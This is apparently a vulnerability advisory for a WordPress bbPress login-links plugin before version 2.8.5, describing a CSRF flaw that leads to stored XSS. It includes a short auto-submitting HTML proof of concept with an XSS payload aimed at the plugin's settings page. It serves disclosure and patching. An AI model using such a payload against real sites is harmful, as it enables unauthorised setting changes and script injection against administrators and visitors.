bbPress Login Register Links On Forum Topic Pages < 2.8.5 – CSRF to Stored XSS | Plugin Vulnerabilities

Description

Lack of CSRF checks in the plugin's settings allow arbitrary change of the settings, which can also lead to stored XSS issues.

Proof of Concept

The payload below will result in a stored XSS in the 'Style Customize' page.

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://127.0.0.1/wp-admin/admin.php?page=bbPressCustomPage" method="POST">
      <input type="hidden" name="bbpresscustomcss" value="</textarea><svg/onload=alert(/XSS/)>" />
      <input type="hidden" name="bpoptionsettinspanelsubmit" value="Submit" />
    </form>
  </body>
</html>

Affects Plugins

bbpress-login-register-links-on-forum-topic-pages

Fixed in 2.8.5

References

URL

https://plugins.trac.wordpress.org/changeset/2217772

Miscellaneous

Verified

Yes

WPVDB ID

f24ac427-10d8-4f77-bbc8-950082b5f7ca

Timeline

Publicly Published

2019-12-25 (about 6 years ago)

Added

2019-12-26 (about 6 years ago)

Last Updated

2019-12-26 (about 6 years ago)

Other

Published

Title

Published

2015-05-13

Title

Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilites

Published

2014-12-09

Title

PWG R&om <= 1.11 - CSRF & XSS

Published

2019-05-13

Title

Ultimate Member < 2.0.46 - Multiple Vulnerabilities

Published

2018-10-09

Title

WP Fastest Cache <= 0.8.8.5 - CSRF and multiple XSS

Published

2012-03-21

Title

Video Embed Thumbnail Generator < 2.0 - FPD & RCE